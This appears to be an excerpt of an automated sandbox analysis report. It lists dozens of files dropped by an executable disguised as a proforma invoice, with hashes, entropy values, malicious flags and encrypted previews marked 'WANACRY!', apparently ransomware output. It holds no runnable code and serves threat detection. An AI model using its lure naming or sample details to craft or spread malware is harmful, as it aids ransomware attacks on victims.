                                                          SSDEEP:768:oNmLTtI5kBd09/WhFGzg4UDYchRpAew8ES3JMDqFH3wIzCx:8au/eFGHUDnZAeliDCwIzE
                                                          MD5:E46BE72D3510DDDF587937614E451591
                                                          SHA1:8990EEC532C7B72181EBF62C6C7B14A0E550D3D9
                                                          SHA-256:A45B948091492F0412B592CFC47BD3C2410A2DE8DEEAC143CEB7FF448B28A6E5
                                                          SHA-512:1F0824F56E6FC2ED5E174D563E94A152DE61B4D8EC5D442B9F92D22A217D1864A847635F9C9B261CCA75FEF4224048FA0779DC6D436335DFEC3D01636823E4B2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......N.Y...J....M..X.?.....8!(3..6.g..hYwIv#..:.......0_X.....ZQ..]8..+R2..).o!.\A.:9.n.'F0?.f..6....<U..n.5...K~ /...`EC.c.s^.....~.!.=,..Z...uP.t.?...$T%}.|.f.S.<%#z...J.C.J....nl.0..@:..l.c)..Z.Hp...s...4..!.%....o..Y7.Z.b;...+.'N..o.&.#..76^}......4.......U.........^i<.Hu...y..a.dr;>I'Yl.8.WG....~=U.J./d....c.?i._?.........y.t+l.U._....S]....=q..H.......~:...+._..X... 0&..[.%...g.#YY?JA.......W.4k..E.}...op.y..W4.4-..e...."t...2s.C...Hy'.~..lo...L...rs.I......a..`h.lu...e..M.....K.L...K...1...> C;..@v.=A. *k...q+...j.@.1..Q.kav.I...(.;h.q.|...vI..........n.>j#...c.f....g.]8.=.*.a.'.x.f6..W4t.V..L........rF.i.g....7......p.[t.....&../..M..........F..{..MD.....21..Q=..b..c.<p^....[1....`..^......5.7.0..R..W.(...j..[..........<-.F......g.&*....?'.I..:..0...$.G.i...."...M.....Nlg....G-.IfO.%.JW....0g.m../... ..".3...yR...K....c....C..J.T.E.{.p...uD....m[..,V2..GE'<}..1A....>OO..7.]...b....=.:.G...Y...'Z...0..B....g..'y.~~...(...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.216350818732761
                                                          Encrypted:false
                                                          SSDEEP:6:bkE7DPkSMPXBltWckqEBoJxsyvhSHL1YrrGjB5xrkBKksnL6+ltzjW/Nu:bkEDMPZWcnsyv0HLorGvKBKrLME
                                                          MD5:6728B69FCA0B83F6ADA2A7083620F821
                                                          SHA1:31E2015976DC952157ECFD31BE166B91D9F02105
                                                          SHA-256:ED3A6EAEF88C743E116D0DE74A3F4CEB20DE9C6341B3406E990E05E0FE60A169
                                                          SHA-512:0786D220BF1A575ABA2D28EA08464C3517092C77D4C70445E0DA9DCF8DFA9AF3FA42B166CC695F4B67A590994A74320D661FECBD411BD0E09AC4A960D99C1A1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....\\..ZP&s..(.}..'. .c.Q<.$.i...,....]Y.n@.1.........(.c{$O.&..]..~.....;.<mj.'u3..........g.{..........A.d.D[.%...i...ah._W.....F.DU..C.-.Yp..$.lW.)bG..}..5...[.../=..f.G$J3..!K..a.........['.V..>./Pa..u^....2.yl.0....u...W.....k...<~^..2H..x...................{..(..A
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.160278156339508
                                                          Encrypted:false
                                                          SSDEEP:6:bkEzmJgCDpzoXRPMtml7SQydAhB22VSTEdLjt2bIjMvy4tl/GrQzvFg9:bkEzmGgpz0MwhSFdAHRVSTULB2bIixtU
                                                          MD5:F69DBBE1B19B2D5CA120BAC3ECC3A052
                                                          SHA1:59230ECF67C4598692FA0C4392ABD03AD72BCA4A
                                                          SHA-256:CA935269AAE0F3E3C20CFFBA8F084E6E6FE050DEF0FCA37801492A76465BE01A
                                                          SHA-512:364F5521AA86FBF4F90703AA8EE4438AD30119FD958C60091B155E78AB30E41848FFBC8FB5D2CC03ACF692628A47DECBBF60C71A39319418ACABCABA288CCFC8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....%nU..).G]..G.....m\d...\..g.F..MA.7t...8.....3....`..V...kTA$.ri.@j...nu.f..F...z..A.b..8...j.yZ........;.8...2P....H.....#k....PM.i.M.7.x....S.mK..(..w..\...H.iL}Zz.K..U..(....R=BO..6......0...... ..q.....Y.w\]...~W)c.Q:4.-..q)...6)]..{.%.l............."P.uisR.......
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.99521249558096
                                                          Encrypted:true
                                                          SSDEEP:768:cQ0oABZuOclneMH2elPQPZf24Hhyxj6F5HZzjCF:cQ7AXuieMfHHWK9jCF
                                                          MD5:1396369E726F0977615A5199305DAA5D
                                                          SHA1:8D38E3A5F8F083B191C8E00B7A5F5D7FC952E977
                                                          SHA-256:121484F731D8B48D6CDD9D1682E379C5B193D438BE3FB8700E8A0789CD59FAE4
                                                          SHA-512:C8051C51AF244E448AA1E72F03DE7C8E5328F5E899CD102DD3547C57BBE7C6644EAC6BCAF6A4068ECE97EF97911FE6D3CF059B005E95EE54930DD30C0ABB25F4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......[..z.."...m$a.....]m..&A#........E{..... @2'B..i.HXX.p..X[f}i..H6;.h....L.N...2a......T.o...Z.Qe.g..q.Z.TS..."e.R.:o|....5.k..Kgo.`.h...........K.S.x.'$.k:u0..W u..{p.....*.(>I...Ix<.........}7?.N.,a@...._.3..L..K..~Ca.q...#{..[.u......X..5.........4........;.u .pV..ci)..E.4.....!.....6..c..R..B.t..U.@..3./e..>.C...../T`0..\.NA.B.1.......O.lq........I...`.3r{DUggr.M..2....B..A..\.@.........(G...^.X...eg..c.\.uf...\.7OSj......S3...../lt.....m.dB.....8!........'.R.2...:Z.kV'....&}......I.l.zc.o=..O. h.......+.y.Koj...m.[`.sr...$.-....a....~.@`.,m3..z.G.@.7F...W+e5.Q...Zn./G....;+...g..n.@.../...p1y...C..o].O....Ec&d..v..H..R.R......P........J.9_..L........v..VV~.G.Ay.2'<.A....Jx.u_.~!.:.......<m[.....iS....b]w.r..~...p...BE1.0.....K.....Wt.....>.I%......d....*l....O...D./....d...h..?C.-..}v.e..l.....(./bi...1...@.;..*.CY.r.1-4.&).g....]q..}N.3O.q..wBV).v.&_S....9...F.r.N.>.a.D.>.~[.c.S.?..yfT.w\...........w....].1...H*....T.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.141513416653858
                                                          Encrypted:false
                                                          SSDEEP:6:bkE473+jMZc3SJ1BCE4RvtoLMFML6mC5JZtOvHrSVCfhXy/Gqn:bkE23+jWciJ1B34ltoOQC5JrILSOyOqn
                                                          MD5:463766926B4AFDE4A7FE0E33F3E96A6A
                                                          SHA1:47BF7E8A5DC53C8051A488757E003AE328B46767
                                                          SHA-256:388AF0074C97CF8B430E6F5AB6881A77BDF9FB809E5DDAA28EE3856BC268D901
                                                          SHA-512:C341E8DDEFB401F37EEF578C6020C6084405E2A7AE437E1199A9704753D780ECECB1DD49A39066BD1AFBF0F5692BC5AA42F433E31E9137279E8BA0BEE80F4AD6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........57....m...^...o..n./...N..k....x..Q#.._.e....+..W8y....l.2..A11..m.z.%..?....6`.O.......ZN..p..G3G..rS]...g3......j...w>U.."8...VgY..w...A.'..G;.3".....$........v...}...|.....Ml%...}\.....H".b."...0..\>P.N...p.S.c.^P.t.'.e.D.......A....2H...............].@:B.......
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.232663585543536
                                                          Encrypted:false
                                                          SSDEEP:6:bkEtSPTIx46p7gew+umcdAl1DE81YbWVh++c2dLXZQfzdq/Wz8zAw:bkEEDYw+uSjDE882dlUqsbw
                                                          MD5:3F88E474A205591212F780179BD50B06
                                                          SHA1:25C4B5878BBFB79DCEFB79B0E10A2B745A24D30D
                                                          SHA-256:0300DFEAE85DC0A89C86DA46A301A7B6B914EBEB424318F10D399FAA8C5B11DF
                                                          SHA-512:0654692A5D0A6BC4B27CA4920A305DFC4F3EAA122D577E4AB00F2A3105D2A67E0451734F240B75C985504AB7BA039C3504D99B10C60920BE5FBB0C0DE74495B1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....T..S.2...A.m.{..G..M#r.:@..........wyN.h.]p.2..!.{.h...H;...`<D'^I.......9.s.s..)4z.d.8he.. C..].M..8..R...V.I.......B.mF;.<.Di..5.....Y.....m.m5.H....\..j....&|.Nt1.{.B}.i...|f1.`./..|{.4iV.Uu..nx.!........^..".... ....1U=.TG$...v.X.Eqm..I.%T3..............P_...j..gOsb.+:
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.9943680060318005
                                                          Encrypted:true
                                                          SSDEEP:768:bBk8/urbrjab+qzk4Ly55eRlQbARa6Z6Tb6vCjPh1JJJDTdEGbQWt:bb2rDa+4TfDaq6f6vCjzJD5E4
                                                          MD5:A01D2418AB4855B7911343B21398B869
                                                          SHA1:E470DFD2E107B114146B886C1DC176A2AFA523B3
                                                          SHA-256:BABBD965E3827BBDDF3BCFACDD1653461E7DB9AABFF80BD63766392DC670E93B
                                                          SHA-512:6766B035D9F393B184A2BE649B52A9CD5E27752F71151AD963E9440DF9CF05165F19CC10D8D76E77AB48A970D14BEC4F1E299118DBE7F93C07AD8C133A41612B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........<..O4..X...3.2.....K.JUe..6S1Q....8.vI...1..!N.grP\....x.'.......%=..z.]{k.=4.....Mz..*QF...V.....s..(.k.../wDb.'S.L.{.; .=....V.....\..h...?W./"......e"..E..>.Bv...m{.....*..jmu.oU.....b......}2v..Z/B..u.|....2iL....P!5....d.h..Y>...AU....4..........g:V.]..}1+;...". ...U>.+........STP{..?\.....F.^....u4....l#bx.#w)....k..%.4.p.A......xW.s.....N..z]w..o...|...k.......m}..|2._L.V?..=.....wY....j...`.HAzD.10}...kW.'.I.b.5~BL-j...;.m.'..xY...R.s.L..v.......:7...n/.`...Y.......x.:..GH^Y#..VW.g....P..A....j.Z../Y....;j5...t......n.".23.q.}...dMR.....W.....?.....*..O.l......` 1...U.XH..d(;0.._.~s}..Z`.?M...+..........~....@&.d~Y.b..Q..lz..!2.v...G.....B....[. ..p.Y.]R8.@...y.i...3;.0.b.Z).A.....}..t*.....!..J.Y.........F....M/s.-.K...4....T.n............j..).h..lk..9..Q....9......HH..w..*.z2.....^,G....L.m.>.s.Z..... @].t.j...O*...H......l.S.\d.....H.H. Bu.....U...|/.....F.p.2..l..l...W.H..\5.q..{...N..T...0>r;..z
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.155559774360208
                                                          Encrypted:false
                                                          SSDEEP:6:bkEMN+YDv7ACPC1phMc7qTtlH/cvAo1qeCBb+0ZzGzKaG6v:bkEgFv7ACShMc7qnH/pe0Xzkx
                                                          MD5:8E5488466976E37F5A4F761D97E79D20
                                                          SHA1:BCB5E01CDB3A973BCC0CDF7CA9B05C2EFE043990
                                                          SHA-256:CCA0089459294A491DEF796F12DD42FE5C71A89DD2DED5D81870D3E77DAEA601
                                                          SHA-512:950258A93F7B3193B6A0E13FF8C93C5180634C64BCC2B7A1647058ED8B9FE5F550BDBA00A768580FA532974DDFBAD0A8C00497F9F91542D5E7E4BD914575F503
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C....Mv.`8!..<..)B.L.Q/;..a..8Y.<.X.U.......2..!...H.%R&..0.B.H.P..+..N.U.T..u.b.D..0../Q%....g....O.^.G.-.:.m...d....R......B.!. ...t\/O|J.'..(.G. pn.....V..:q.8.=.-....w.....e.?..Q......&..:*H..c....I..P..D)...wy.2DxT....O....B..W....ojl...bZ~............m.w/.l..u..4..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.177486210156398
                                                          Encrypted:false
                                                          SSDEEP:6:bkEJCmDaS7t2KlEKyfEeLsAiOFM1tdvmIrMWiY3FI9fmKh7RGGX:bkE7I88pojambmapWhhtv
                                                          MD5:731682DABCE3AAF77E6D0A3E507856AD
                                                          SHA1:78A938079242C9351AC57AA0BB4F7573C71181AE
                                                          SHA-256:42EDEF115A67E36077BE14CF91FF8BD83562FC9FDEE1882293A03B35266ADB18
                                                          SHA-512:CD3EA233F710F455E973D06C48091FC161170AE6DBF86292ADA295D8A1CF84276E7502FA6FE98C309A924B418518CA56FC12712F921F285ED63E3634CB9CC2BE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......).=J.W..% .FD..............q..;....9/,.W.1g.......G....$l.!.n..vA.R....h..l!CX#rMJ-c...Rj.mr........zb.:..t....Wa_:Zg..tQ>..K.2.he>(.xhV...D.J3....D3....d.g.7.2&V...e.mo.q#q.5b.f.K..R.o.../.N-.`...Z...$Q...B...U$..6..c.~.5.....h..I................ 9.;.p3..T[..+.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1426184
                                                          Entropy (8bit):7.999877461155073
                                                          Encrypted:true
                                                          SSDEEP:24576:XwNgTi4o64jGC7Eo5MsUSzU47A8gSh2oDHmXVbsSuLnDnIVvicimyNZIJNg1+Zct:g135OSz9gSh2oDHCVbsrDnIVKcRyfR0K
                                                          MD5:F97497364710A7D7E2AC51DFD1367943
                                                          SHA1:7586479077AF949F6F2218C5258CD546D328141C
                                                          SHA-256:7E2AAB6F4665F58EF984ADA9A7C324BB7D0C6256E0D6335EA049194E08CB0240
                                                          SHA-512:12D02D59BA2047B03903B5771D9A79FFD463DA801DFDA7A9A7A9378DF7A6663F80EAF3678EB2378C0C8B23000F5121EAE494BB121D57112F97EC24740C41F5C7
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):352008
                                                          Entropy (8bit):7.999490804583247
                                                          Encrypted:true
                                                          SSDEEP:6144:23WB5XU/RC2QOfJR9tLWO3MCD4ZmnBchrUe85z+SqMtbcWjJ/mnND2zGZ0p:Ry3hH1CZZmBmO5zF7LJOnND2z5p
                                                          MD5:D1A4954D7C7765AA58ABB84DA0EC97ED
                                                          SHA1:4BD05B8EC7565AC2BAAAD13FCFECB5C96BEC5C41
                                                          SHA-256:3021864C78866E9A64850D4CC54EA22596A327273C3CE18DC1A042DEB78B4F45
                                                          SHA-512:B32F185208CDBCA286BA4B149752BF57C729A45B4ABB41943F2652ACB98FE9E9CA53EA071E88AFC19F73AE4E60C76591B5F60593494F79C584117A398F07BBE2
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243784
                                                          Entropy (8bit):7.999077138822792
                                                          Encrypted:true
                                                          SSDEEP:6144:QpMSLU/XdP1rUrtMTy2bDQMQ6JpwXi9Ja0UQLZSZ6L:QZQvTrmMTbDQMQ6JpOi9ktQLZGK
                                                          MD5:D2EB34B4B958BAE0827346E106D5D148
                                                          SHA1:91DF130EDDC9FD324F22D93C6064E616F038F930
                                                          SHA-256:8E0D3143227F44C0E1FFB6B8024EFB95CE0A3569A9E624A9FFC21374FCE40AC0
                                                          SHA-512:9C0734A7D56B0DBB88C9B1C03E5E320B76C5E2761AC1716B865E3EB124915A84BE658C131256F9DF1E7DF8ACEE3C2C270E3DBFB0587AA98B230F2A6BBE3E0550
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533032
                                                          Entropy (8bit):7.999686835672844
                                                          Encrypted:true
                                                          SSDEEP:12288:zfv9K4I8yI2pERjY1+ncIadU3Hr0vCAuCguC/kbnizEUL:TXVZY1+nc5dmr0vFXguCanM
                                                          MD5:334108536186C71B9816E52CB87B9B7D
                                                          SHA1:B3971A8DAA398E60578A1301832087207069EF76
                                                          SHA-256:162CC8A664BE87C746F4ED1AA292E9C9EC51DD154FCE1B833338636B759732A3
                                                          SHA-512:CBEC6FF86EC78D2B1ED26A1F68E252BDFE24BE9F70FF40D203D495BCB4A7420E9DFCB70ADF37C480DFE04545829C6E30A289C43055733BE885D0E8BFCE5DF373
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44792
                                                          Entropy (8bit):7.995800987643325
                                                          Encrypted:true
                                                          SSDEEP:768:obwVik/2osBaei4jtkCtLNRNiwj8iIa+3NIyYIi8zoyMxjLsrGWOtqPtv+xw:oBknMFkKIwIiK2yYTKcjL9/AF+a
                                                          MD5:9B617B06CC8CDAC8F73A6CB2AE7D865F
                                                          SHA1:DF59B63B9F298166F0F1B9FC88DC972471464FE6
                                                          SHA-256:48DD6E984CC2196C467499D1CD82DBF7809F37F09EA62123F2CFBA69A81C2531
                                                          SHA-512:AFCA7B35827D49C69318F9F547E9540914D889666EB6BEC6E205FC2B92E154DA89D2D46F123DA8853189AC23E734597863A52EEA1596461343A6571097336760
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104008
                                                          Entropy (8bit):7.998472946641516
                                                          Encrypted:true
                                                          SSDEEP:3072:/M11sweffIlUKV23JZ9bgTlKOa7+rgBEv0ssD4ipG:01swe3gU33JZ9UT3rgqJgG
                                                          MD5:64506F302DDD55E18132BB1BADAB97CC
                                                          SHA1:3DB1F5AB545856D5742C82355B30884EBD5FB39F
                                                          SHA-256:63FAA009E12F488AF679D379FD05EDDB531F55C84AE0235A7D42DBC2598A1972
                                                          SHA-512:4EDFB8E050C0C59B189183C53357E5C30DE75D77160AD39F63274C9F50EC4892DF1AFE7680A62076CDB2B46AC1D9DF2AFEC7BDC310E5B1AB4C863F77DF1D0588
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999195528987239
                                                          Encrypted:true
                                                          SSDEEP:6144:1ARb7YxoX/lfgEqsTZCHncza8L7KWJIKVO/u1uOcQXT9QK:a0mNfgEqFncLKOA/Y2I+K
                                                          MD5:9C68F46B6C043C49E75BCDCD6A7FE4A1
                                                          SHA1:1402532FFDDF1F5239F4F51B7A4733EE5E8FA6BA
                                                          SHA-256:6AF4EC05B2A32D049316C286B9734D05ED7D6133FC7B6D88B07FF4F44F71FD29
                                                          SHA-512:E96BBD751DE982757F430A52C7486EA6B1D177F6CD9A13643ACB55EB443BD1DD27BAA455FFAF11EFE84EE464CE0559C8B68EEFDD493EB1F71C30F33AC1CF91F9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.20899371547493
                                                          Encrypted:false
                                                          SSDEEP:6:bkEGMC1a9LcAyf5q+T2K6SEUkoV6EunVocde9LruvlPFHGa:bkEHNyfI+t6nUdvuniQuCvzHr
                                                          MD5:56C08B2D0B927FBB56F70A16C2E3863E
                                                          SHA1:7146BF809BFB2ECA667E3A6CEC131F3CD3E90CDB
                                                          SHA-256:FF7623202E10E9B96EBA99C8A78827ABE7EF6794A7A26714C909C2E2674B3954
                                                          SHA-512:89A629B82AC7EC5B4447217833206AC26E1A868E2A536D052EF9BA7B91F4AC436C394A7858DDA31510239FD22567B0770825F2987AB8A6CC9AA8B8B841A51B04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.150633720622366
                                                          Encrypted:false
                                                          SSDEEP:6:bkEcB2Ln2R6lvfyuZAkLi97U2V4PmjpKZVX2j4Gx29i2ScFfvg2mN:bkEcB2L2clvPAku74Pmt8Gxglvc
                                                          MD5:72E16C6935ABC10BAEA76AA29F3F81FF
                                                          SHA1:BD7AD98157BD5E9875CFB0BC81338949ADF0EEDA
                                                          SHA-256:093A7AE361E1DED3975946BECBEA664543A4DB09ADE319C14663434F2675BD85
                                                          SHA-512:216A816A33F047A43F08653C94199BDFCD9D8B0DF5B3DD2EE6BEB89652948FA63A0E4BE855418B22F8A7032DE39C3001F350D31424F2C3EFE6CC3AE2045B2FB0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217800
                                                          Entropy (8bit):7.999175669001736
                                                          Encrypted:true
                                                          SSDEEP:6144:G6DPR/Hf4X4tRuMxWfZ82C+cN+5yCt+mzT/:TDhwqRurR4+0yy4zT/
                                                          MD5:F7DAC19E137B24E0FE77185D23795F92
                                                          SHA1:1B73B5725B018B5E54F5325CE063345BC86A40F1
                                                          SHA-256:C8B004EEE168AA77D57D5836AB11CF6F02D0E9DA9CD068ED187492CAD1F14B82
                                                          SHA-512:A45153ACA4CC2EA49E762AD73160C04CA9E24108DD7F932296D7A6A117E7512D2F119FCF5E439491136EF93805AB71AF68C5DB8F792B2CECAADF26E8863E6842
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.053269467012793
                                                          Encrypted:false
                                                          SSDEEP:6:bkESvoGC7Mqk3qLryFRppj6SZvM4Dg1aX7LfzFStm3rS0t7L:bkEE73uryFRj611QfcqlL
                                                          MD5:59851BD4AEC293313A020AFE15883FCE
                                                          SHA1:2F09444FADF022815FDF618FADF9669C9477A42C
                                                          SHA-256:273149E0868C4BE69CA1C39079F19F86A02358A2EC925BB2481F8EBC7BD9F0E8
                                                          SHA-512:DF01668D22DF6892A5D51A2F7E90578C785A91C5896676FBA54F6B7C865567B0F24DBC9719E4F74704A8BE0AD7DCDB121E4B7DEF1AEE55EBB4A43D944E437C38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.24319288120606
                                                          Encrypted:false
                                                          SSDEEP:6:bkE/B0Yi9Fy++cT10fdlm41YUqUYdTbyL4iiBSqnhUVHIv3Pd69Ty1rdfU/+eNqP:bkE/BzIc++cTae41jqUYRbY4iiBlMoc+
                                                          MD5:7DE50B0371ADF2F79581AF12971235EC
                                                          SHA1:DBE84D319D8A65CDC450CD5C154C97379AC257A9
                                                          SHA-256:C769FE0E890DF4E9A3F9DC8FC08BECCE43DC5101B84FB5B646A82951BDF65183
                                                          SHA-512:FE7C8FA29B84840959878AD0F2E24184B437824779AC4C05246AF2799EDFE47A7444260939D224D6640235A8E7CE40CD7CA3887247DAF99D36254634DC69B0D0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):101816
                                                          Entropy (8bit):7.998414227061809
                                                          Encrypted:true
                                                          SSDEEP:1536:0qSUdSM9lTGklTktNjVJNn/MK0xCeLYfLK5AFkiXATLsyIbh8a86+GjHok0CIGMw:0kdSM9lXTIXd/MD88YjyQKfSbSG7571
                                                          MD5:D507FE8C2A8E8343CAA7C3F4B379B0EF
                                                          SHA1:742E895E2185AD54B571750E739EFBFA3005DB33
                                                          SHA-256:1D5D0BB2AFE8232867492C3F4054920FA0DFD6148C82C53D8E05763706C28668
                                                          SHA-512:4500B0CD98B88EDEF9DA957E4AF72D1BAC0D83189B0DB21981FC20A0970F14D681B13D546FBC4E192542A3DFB39E281C0FF2B48AFEC4A8889EA529886A3EF4A1
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998454795859105
                                                          Encrypted:true
                                                          SSDEEP:3072:s7gdeLvKQoHKH/8ij8qOte60eIHxMtNe/i:4lvKrQ8cKceIHWtNqi
                                                          MD5:97FBF69CB2ED7F4A0C26970903952D81
                                                          SHA1:5F095FBFC48BF4429C4B508271B6D7C171C502CE
                                                          SHA-256:EAD3365A9A77B2A5BC9C1349D6BDFD20FF7BC8D2F847C0F97ED7861D0CD2ED9A
                                                          SHA-512:8D7D8D5270297D168D64CD30D18E01F988ED412D9AC58CF9A2D385F01BD1EC144FCDB7CD21B7B8A32FE456D9803FD766EE6AAD5E49E179071A8634D044E4B360
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104072
                                                          Entropy (8bit):7.998255098876641
                                                          Encrypted:true
                                                          SSDEEP:1536:hcojy3lQOSxDAEQv9VYaK8xld1sRxATDIPwbh8assa0x6smNvvPIccs80071H:h8IxE/rZUR6brfx6sm920071H
                                                          MD5:B2AC304FA33BEF498375F6F52978324D
                                                          SHA1:231DD1D20EFB33787417F6235FC7F3EBE5F70995
                                                          SHA-256:23199A22798B88608CAAF219EB153F5C858A7D31324E5BEA23F55A734A7D9DAF
                                                          SHA-512:EDEB8AD41D474742ADFC529BAC8B2156B330919C355279396660A8A303ADB81F880593F558D60CB9F4590329EB43D8E88910A9C7F8FFAD12CA607DD3489FBC33
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105032
                                                          Entropy (8bit):7.998103117954112
                                                          Encrypted:true
                                                          SSDEEP:1536:oCa7TkPWhh8Y/9cYwKcAAgYEnJLVSDuWaW8n7f+99uoXWGwFtmeNC1kMjS3ywDZS:gTGWhhd1cMApEDYv0f+99/kEXxK8HWVM
                                                          MD5:E4D32B6187E151B07771505CC4DDE537
                                                          SHA1:39D5C766D2126C7D54919DB7B8AEC65902F33D61
                                                          SHA-256:AF6AAC48A4DD7947E1C6796EF7014B9C4B67ABBEF4E28D4997F2175F77551B6D
                                                          SHA-512:A2A577E7F6DA746A1542EA3379FC99386C5078DB204A516C30CF7800E2D3942D6FE29A4A6B135ECAB11C92162AAD33E628321437A3B67222086426363B2AE380
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....j..p5.......$..Y]..g-:W..$.!........T6D..N`..b...H[p.(.%=..$n...B.R.p@..!f.OB/eT...&.O...L..%........_.}..Q.@{....J..f.n......!..........O........9....B...v..]T;.0.R9..*...c.....3.....-..b.....4...PN.K.......\.H..v............y.@.9k..............%........q...7.....C...o.g.S..j..q........C.!f...B.5....z....b....8B..d&....r~/_m.....'3..."..L...X.Zn......a.f...R.r.p.$..x?.O..........hCa^t.L.}...W..4......d..Y'......p.y.ui......A5T.6P%......FXsw.l.g.$^G....].&]......'g..;g..(.UOhP.p....Q...^Z..}tb..T...^8v..g..S..`..6....-.$.5e.."......l..)..].I._..dk`{....8{.x*.wN.n.7L....x.....O.;@7._....Z..L...s.............../.`......Se..7...P(..pd.tS.... .f.h...b.t.D....e..m....}jY{..-...'..Y.g...df..w......zD.v4s.z..}=ecT............Y$R......L.@...B.......p..i.pS...>......../`k...LPT..|.f>a9R...`$N_.I.!P.7...b...c.QG...$agY...z..~a.Lxb...yJ....4 .<[e0..\N.&.......p-..s.1...%D.HK......|,.U.....*.f.NO.$..DLz..2..RK-3.*....:M3[../....k...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105064
                                                          Entropy (8bit):7.99831379770481
                                                          Encrypted:true
                                                          SSDEEP:1536:vceMn43nD5A+NUqqDv1xpqp02Tb/5sqjo8Stb0+RY7gw3T+AjlS2idWG+Qk:E83n9A+N4xxBIbItbZRYZBmWGPk
